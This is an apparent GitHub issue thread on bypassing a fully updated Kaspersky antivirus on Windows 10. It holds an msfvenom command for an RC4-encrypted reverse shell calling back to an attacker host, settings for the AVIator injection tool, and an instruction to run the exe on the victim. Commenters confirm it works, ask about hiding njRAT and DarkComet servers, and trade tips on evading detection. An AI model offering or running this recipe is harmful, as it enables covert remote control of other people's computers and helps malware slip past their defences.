Kaspersky AV bypass Test Case
Ch0pin opened this issue · 6 comments
Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)
Getting a shell in a windows 10 machine running fully updated kaspersky AV
Target Machine: Windows 10 x64
Create the payload using msfvenom
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
Use AVIator with the following settings
Target OS architecture: x64
Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)
Target procedure: explorer (leave the default)
Set the listener on the attacker machine
Run the generated exe on the victim machine
Thanks for your efforts it working well
Do you have any tool like Aviator but for encrypt exe payload like meterpreter also for encrypting malware servers like njrat and darckcommet
Thanks a lot
Thanks for your efforts it working well
Do you have any tool like Aviator but for encrypt exe payload like meterpreter also for encrypting malware servers like njrat and darckcommet
Thanks a lot
not yet , but this is something that for sure I am going to implement in the very near feature
my Dear
i test the windows/ meterpreter/reverse/https and tcp there's no reverse connections
also when i test x64/shell it working there's a reverse connection but no meterpreter channel opened
Once you use meterpreter,the antivirus will detect it.However,shell won't.
Maybe encoding the dropped dll is the best way.
i use x/64 shell and it worked but no channel open although there's a reverse connection?
Make sure you are selecting the right architecture for your shell code and for your target OS. As pple7000 said when u use meterpreter the Av propably will detect it and drop the connection as suspicious, if you use a simple shell payload the bypass works fine.... Just press few enters after the connection is open ;)